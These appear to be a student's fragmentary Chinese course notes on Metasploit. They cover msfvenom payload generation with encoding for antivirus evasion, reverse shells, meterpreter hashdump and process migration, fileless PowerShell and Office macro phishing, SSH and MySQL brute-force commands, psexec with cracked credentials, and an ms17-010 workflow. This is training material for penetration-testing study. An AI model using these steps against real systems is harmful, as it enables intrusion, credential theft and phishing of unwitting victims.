day11 MSF（一）

今天讲payload的使用

生成木马的参数 和钓鱼 

web_delivery 钓鱼模块经常用 也可以会话建立

能拿到一定系统权限 可能权利很小 但还是能提权

很少用exp poc

提取

这个也很重要

拿到一个web的权限 怎么脱库 只拿到web权限没拿到服务器  msf已经建议会话 通过这个模块

在内网就可以 将1.2的152端口转发到我们电脑上的1521端口

这样我们链接152就是链接他们的1521 这个我们就是端口转发

假如您跨越n个网段你网不好 你会非常卡

3层就非常吃不消了网

msf简介和所有参数

payload 成品

shellcode 半成品 需要服务器环境配好

-f exe

-e编码变型起到免杀的作用

-a 指定位数 x86 32位 x86_64 位 不指都是32位 以后说怎么指定什么位

-platform 是指定linux ， windows

-b也是干扰杀毒软件

 -i 指定几次 多了可能就坏了

-c 注入到一个文件

剩下的自己看图

MSF常用参数

例1

msfvenom -l -p 展示payload列表如下图

只有在后面加了x64才是64位 

前面是系统 

meterpreter 后渗透模块 也就是 系统/空或者x64/攻击模块

bind_tcp_rc4： bind 我主动去直接连接你， 如下图 ， 如果你又防火墙 会把我拦截掉 tcp什么协议进行连接 tcp 连接最可靠 https http 拦截的比较松

所以我们不用bin 除了特殊情况

网络穿透没有回来路由

这个后面详细讲

reverse

反过来连接 被攻击 连接我们

例2 我们通过stu java写的这个东西拿到system权限 毕竟stu一般都是管理员用的我们利用它就是得到system权限

现在我们面临一个问题 我们入侵数据库 但是这个数据库服务器不出网

目前我们是tcp建立的会话

我们想了下 不出网是不是协议的拦截 当然另一种方法是隧道（只要能访问网站走隧道一般都没有问题）

那我们可以试试reverse 走http

MSF常见参数

第3个简写  msfvenom -l e

好用的免杀 如上

监听模块

cs稳定 不容易挂 只要系统不关机

msf功能多

cd可以加脚本插件

payload可持续化

各个平台payload生成 与 监听方法

安卓的话区 youyube 搜教程 安卓 一个月最新 一般视频下面就有github

电脑上一般有客户端 有一定面杀 不免杀就使用社工

生成后 在当前文件夹找 你是root 就在root文件夹下

msfconsle 监听

这届handler也一样

设置好了 option一定看一下

cs半开半关稳定不容易被发现

msf容易被发现

这时我们要用 englock 后面会讲

这时我们session -i

调用的话

session -i 1

就进入这个系统的cmd help 就可以看帮助 

权限不够进行提权

run po 后渗透工具模块

hashdump 获取hash

去桌面

只能监控看 不能操作

修改参数就能不只是只读状态

3389被限制可以试试vnc

很脆弱 中断了就断了

安卓payload

社工：

apk藏木马

linux：老方法

如果生成 php -f raw

改为php 平台就不是linuix 而是 php

hander命令参数

powershell配合msf无文件攻击

1.找到这个网址

原理讲解

2台机子 下面是web网站

我们将xps1文件上传到web  然后xsp1

将命令发送到目标机 然后目标机 和我们的msf建立会话

2.命令

尽量64位 powershell用32位会出现一些问题

3.调用

vps替换 没听懂

老大直接把命令放在08服务器cmd里面

先看有没有连接上 在运行cmd之前

当主机执行命令：

那么就开始被监听了，此时主机上面没有任何木马

1.钓鱼2.shell 找个地方运行

word钓鱼

1.添加域

2建立连接后 赶紧迁移进程

MSF宏钓鱼 对面没有安word

1.网卡的话可以使用镜像

2.下载好后到相应目录

3.python2运行 然后 msf连接

4.先监听

捆绑之前先看端口

监听之前先捆绑

上图是监听代码

5.完成之后迁移进程

在受害者看文件时 sessions -l

然后赶紧如上图迁移进程

sessions -l 8 

migrate 3032\

实际操作时注意免杀

MSF宏excel 钓鱼   ？？我没跳过怎么后面变成无文件钓鱼

下面5张图是常规步骤

展示目标

设置目标 

set target 1

options

run 

会生成命令

直接让目标主机运行结果崩了 因为忘记设置64位

崩了之后换个端口

重新 run

另一个简短的方法 无文件进入

先到另一个武器库 然后如下图

还有setpayload php/ 的提权

记住前面的步骤这个差不多

制作钓鱼

---

msf

1. msf 信息收集模块
2. msf 密码破解模块
3. msf 漏洞利用模块
4. msf 各种payload
5. msf 后渗透模块

一、msf 信息收集模块

1. 1. 基础命令：
      1. show：后跟模块或者要展示的信息
      2. search：根据命令搜索，search <xxx>格式搜索关键词，search name:xxx会更精确
         1. search path:xxx：根据路径搜索
         2. search platform:xxxx：根据平台搜索（操作系统，数据库等）
         3. search type:xxx：根据指定模块
         4. search cve:CVE-2017-8684：根据cve搜索
         5. 一般search+想搜索的内容就行，如search ms17-010
      3. back：退出模块
      4. exit：退出msf框架
      5. use：使用模块内容，如use exploit/multi/handler
      6. msf中也可以使用 whois 和 nmap 等linux命令
      7. rank排序：excellent > great > good > normal > average >low > manual

1. 1. 端口扫描模块：
      1. search portscan：搜索端口扫描模块
      2. use auxiliary/scanner/portscan/syn：使用syn扫描（可以输入前面数字）
      3. show options：查看设置详情
      4. set rhosts 192.168.1.2：设置目标
      5. set threads 50：设置线程为50
      6. run：执行

1. 1. 基于特定的服务扫描：

扫设置的ip是否开启了改服务

1. 1. 1. search smb_version：搜索smb扫描模块
      2. search mysql_ping：搜索mysql扫描模块
      3. search ssh_version：搜索ssh扫描模块
      4. search telnet_version：搜索telnet扫描模块
      5. search ftp_version：ftp扫描模块
      6. search arp_sweep：查看主机存活模块

 

模块：

1. exploit：漏洞利用模块
2. auxiliary：辅助模块
3. post：meterpreter里调用的模块
4. payloads：攻击载荷模块
5. encoders：编码加密模块
6. nops：填充空白代码，躲避杀软
7. evasion：自带的bypass模块（一般也不用）

1. 目录扫描：search dir_scanner
2. 搜索网站的email信息：search email_collector
3. 嗅探抓包：use auxiliary/sniffer/psnuffle，抓取明文流量信息

二、密码破解模块

search 服务名_login：爆破指定服务

1. ssh 服务爆破：
   1. use auxiliary/scanner/ssh/ssh_login

b. set rhosts 192.168.1.11

1. set username root
2. set passfile /root/pass.txt
3. set threads 50
4. Run

1. mysql 服务爆破：
   1. use auxiliary/scanner/mysql/mysql_login

b. set RHOSTS 192.168.1.111

c. set user_file /root/user.txt

 

sessions -l：列出会话sessions -i 1：进入会话1

mysql不能爆root，

因为 mysql 默认不开启外联

可以爆破普通用户

 

kali远程登录：rdesktop <ip> kali字典生成工具：crunch

crunch 4-6 guanliyuan -o pass.txt

（生成4-6位包含guanliyuan字符的字典）

1. set user_file /root/user.txt
2. set pass_file /root/pass.txt
3. Run

1. tomcat 爆破：

可以用 tomcat 爆破模块，也可以用依美式

1. postgresql 爆破
2. telnet 爆破（很慢，用smb更快些）
3. smb 爆破

 

爆出smb账号密码后，对方没开telnet，也没开rdp 怎么控制系统：

psexec.exe \\192.168.1.111 -l administrator -p pass cmd.exe

三、漏洞利用模块

1. 一般的流程（例子）：
   1. 使用arp_sweep寻找目标网段存活的主机
   2. 用smb_version看看开了445端口的主机
   3. 用nmap --script smb-vuln* 192.168.1.1，通过nmap 的脚本搜索一下这个ip 的smb相关漏洞
   4. 如果扫到例如ms17-010的漏洞，在msf中搜索 search ms17-010
   5. 使用模块，设置参数，show targets查看可攻击的版本目标，set payload
   6. run/exploit

 

进入shell乱码，编码问题：chcp 65001 编码转换

Win7 payload一般用默认的更容易成功，用其他payload可能不成功，可以先默认成功再进行用设置payload测试

1. 远程代码执行漏洞
2. 浏览器漏洞
3. 服务漏洞
4. 本地提权漏洞
5. 这篇文章写的不好因为断断续续看没有认真看 以后网站钓鱼 和 拿到cmd powershell 需要用再回来重写 重看 这个视频吧